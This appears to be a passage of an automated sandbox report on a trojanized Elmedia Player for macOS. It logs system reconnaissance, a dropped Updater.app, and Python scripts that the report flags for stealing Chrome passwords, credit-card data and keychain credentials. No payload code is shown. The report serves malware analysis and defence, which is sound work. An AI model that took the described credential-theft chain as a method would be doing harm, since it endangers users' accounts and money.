Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Reads hardware related sysctl values
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Sysctl read request: hw.ncpu (6.3)
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Sysctl read request: hw.cpu_freq (6.15)
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Sysctl read request: hw.availcpu (6.25)
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Sysctl read request: hw.ncpu (6.3)
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Sysctl read request: hw.cpu_freq (6.15)
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Sysctl read request: hw.availcpu (6.25)
Reads the kernel OS version value
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Sysctl read request: kern.osversion (1.65)
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526) | Sysctl read request: kern.osversion (1.65)
Reads the system's OS release and/or type
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Sysctl requested: kern.ostype (1.1)
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 533) | Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 539) | Sysctl requested: kern.osrelease (1.2)
Reads the system's hostname
Source: /bin/sh (PID: 521) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 523) | Sysctl requested: kern.hostname (1.10)
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 527) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 529) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 531) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 537) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 540) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 542) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 544) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 546) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 548) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 550) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 552) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 554) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 556) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 558) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 561) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 563) | Sysctl requested: kern.hostname (1.10)

Stealing of Sensitive Information:

Creates files with functionality probably related to stealing credentials in Chrome
Source: /private/tmp/Updater.app/Contents/Resources/ch.py | Found specific keywords: <chrome-record>, <login>, <password>
Creates files with functionality probably related to stealing credit card information
Source: /private/tmp/Updater.app/Contents/Resources/ch.py | Found specific keywords: expiration, credit_card, amex, visa, mastercard, discover
Uses Python chainbreaker to extract user credentials from keychain files
Source: /private/tmp/Updater.app/Contents/Resources/cb.py | String pattern found: "Tool for OS X Keychain Analysis by @n0fate"


Runtime Messages

Command: open
Exit code: 0
Killed: False
Standard Output:
Standard Error:

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches
